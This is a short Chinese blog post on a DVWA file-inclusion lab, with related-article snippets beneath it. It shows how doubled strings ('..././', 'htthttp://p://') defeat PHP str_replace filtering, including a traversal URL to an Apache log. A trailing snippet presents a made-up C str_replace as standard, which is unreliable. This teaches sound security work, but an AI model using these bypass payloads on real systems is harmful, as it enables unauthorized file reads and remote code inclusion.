包含漏洞的str_replace函数绕过

最新推荐文章于 2024-05-03 21:44:52 发布
最新推荐文章于 2024-05-03 21:44:52 发布
阅读量393 收藏
点赞数
分类专栏: it 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arissa666/article/details/133189052
版权

str_replace函数绕过(双写就可以绕过)

DWVA中等级别的时候会有防御过滤,过滤之后之前的本地远程包含就会发生执行错误

本地包含绕过

因为把../会替换成空,所以原来有../的地方要写成    ..././  这样中间的红色部分去掉之后还剩下../就会让那个过滤不起作用

http://192.168.246.11/DVWA/vulnerabilities/fi/?page=..././..././..././..././Apache/logs/access.log

远程包含绕过

可以把=后面的http://写成,htthttp://p://  红色的部分过滤掉之后还剩下要用的http://

绝对路径不受影响

C盘1.txt文件获取,是可以正常读取的

学海无涯一叶扁舟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php str_replace的替换漏洞
10-30
php 的函数str_replace替换漏洞
文件包含漏洞之——str_replace函数绕过与——包含截断绕过
温柔小薛的博客
04-08 6387
str_replace函数绕过 实验环境DVWA,安全性medium 有时程序员会使用str_replace函数进行防御,这个函数是极其不安全的,因为可以使用双写绕过替换规则轻松绕过 绕过方法 例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103...
2024年网络安全最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(2)
最新发布
2401_84265972的博客
05-03 1049
/使用1.0就可以绕过if(MD5(GET′name′])==MD5echo $flag;echo ‘?PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
PHP CTF常见考题的绕过技巧
热门推荐
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
php str_replace的bug
不说不可能
08-03 1501
昨天意外调用了下str_replace接口,最后一个参数传入一个常数,之前以为是表示传入这个常数,php只进行这么多次替换。 结果php部运行了,折腾了一个晚上,最后将svn中代码与修改的代码比较,将修改的内容回退,php运行正常。 奇怪,反复实验,最后确认str_replace传入常数导致无法运行。也奇怪,php不报错,也没有运行时错误。。。。 估计php怒了 更多认知,感悟...
PHP中strtr与str_replace函数运行性能简单测试示例
10-16
接下来,`str_replace` 函数则是更为通用的字符串替换函数,它接受三个参数:`str_replace($search, $replace, $subject)`,其中 `$search` 是要查找的值,`$replace` 是替换后的值,而 `$subject` 是原始字符串。...
php str_replace替换指定次数的方法详解
10-19
以下是对`str_replace`函数的详细解释及其如何在需要指定替换次数时使用的说明。 `str_replace`函数的基本语法如下: ```php str_replace(find, replace, subject, [count]) ``` - `find`:必需,规定要查找的值...
PHP中str_replace函数使用小结
10-30
在实际的程序开发中,执行字符串替换操作是一件非常经常的事,对str_replace函数的实用也会非常频繁。
str_pos php,关于php中str_replace替换漏洞的分析
weixin_39900468的博客
03-13 183
这篇文章主要介绍了关于php中str_replace替换漏洞的分析,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下定义和用法str_replace() 函数使用一个字符串替换字符串中的另一些字符。语法str_replace(find,replace,string,count)参数 描述find 必需。规定要查找的值。replace 必需。规定替换 find 中的值的值。string ...
PHP利用str_replace防注入的方法
12-19
PHP各种过滤字符函数复制代码 代码如下:   <?php    /**    * 安全过滤函数    *    * @param $string    * @return string    */    function safe_replace($string) {    $string = str_replace(‘ ’,”,$string);    $string = str_replace(‘'’,”,$string);    $string = str_replace(‘'’,”,$string);    $string = str_replace(‘*’,”,$s
str_replace导致的注入问题汇总
weixin_30455365的博客
08-05 436
    研究了下replace的注入安全问题。     一般sql注入的过滤方式就是引用addslashes函数进行过滤。 他会把注入的单引号转换成\',把双引号转换成\",反斜杠会转换成\\等   写一段php代码: <!DOCTYPE html> <html> <head> <title>&lt...
上传漏洞绕过
weixin_51313108的博客
08-17 396
这里写目录标题绕过的思考客户端绕过控制js代码bp修改请求数据包服务器端绕过MIME检测00截断 绕过的思考 web应用程序往往允许客户端上传文件,但是程序员如果不对上传的文件进行验证和限制就会导致文件上传漏洞。检测上传的文件有俩方面,客户端检测和服务器端检测。 客户端绕过 客户端是通过js代码来实现对文件的检测。那么攻击者就可以控制js代码来绕过或者修改http请求绕过。 控制js代码 一段前端代码 <form action="" method="post" enctype="multipa
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4005
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
攻防世界2分题(Web_php_include)
qq_45791542的博客
08-01 288
看题 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 绕过str_replace函数,经查资料知道str_replace这个函数及其不安全 关于绕过函数str_replace的方法 1.大小写绕过 2. 双写绕过 这里用大小写绕过 抓包..
文件包含漏洞3
qq_61714717的博客
12-18 100
文件包含漏洞
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5740
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
str_replace函数用法
07-22
str_replace函数是一个字符串替换函数,在C语言中可以使用该函数来替换字符串中的指定内容。它的基本用法如下: ```c #include <string.h> char* str_replace(char* source, const char* find, const char* replace); ``` 该函数接受三个参数:源字符串source,要查找的字符串find,以及要替换成的字符串replace函数会在源字符串中查找所有与find相匹配的子串,并将其替换为replace函数返回一个指向修改后的源字符串的指针。注意,源字符串会被修改,因此调用该函数后,源字符串的内容会发生改变。 下面是一个示例代码,演示了如何使用str_replace函数: ```c #include <stdio.h> #include <string.h> int main() { char source[100] = "Hello, world!"; const char* find = "world"; const char* replace = "CSDN"; char* result = str_replace(source, find, replace); printf("替换前的字符串: %s\n", source); printf("替换后的字符串: %s\n", result); return 0; } ``` 运行上述示例代码,输出结果如下: ``` 替换前的字符串: Hello, world! 替换后的字符串: Hello, CSDN! ``` 这样就完成了将源字符串中的"world"替换为"CSDN"的操作。注意,函数只会替换所有匹配到的子串,如果没有匹配到则不会进行替换。此外,str_replace函数是区分大小写的。如果需要进行大小写不敏感的替换,可以使用其他函数或自定义实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值